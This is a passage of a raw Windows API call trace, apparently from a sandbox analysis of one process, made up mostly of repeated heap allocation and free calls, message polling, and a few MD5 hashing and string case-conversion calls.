cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0195.615] CryptCreateHash (in: hProv=0xad6150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0195.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0195.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.617] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0195.617] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0195.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0195.618] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.618] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0195.618] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.618] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0195.619] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.619] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.619] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0195.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.620] CryptHashData (hHash=0xaa57e0, pbData=0x24b1728, dwDataLen=0x3, dwFlags=0x1) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0195.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0195.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0195.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0195.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0195.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0195.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0195.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0195.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0195.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0195.624] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0195.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0195.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0195.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0195.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0195.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0195.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0195.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0195.625] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0195.625] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0195.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0195.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0195.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0195.625] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0195.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.626] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.626] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0195.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0195.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.626] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0195.627] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 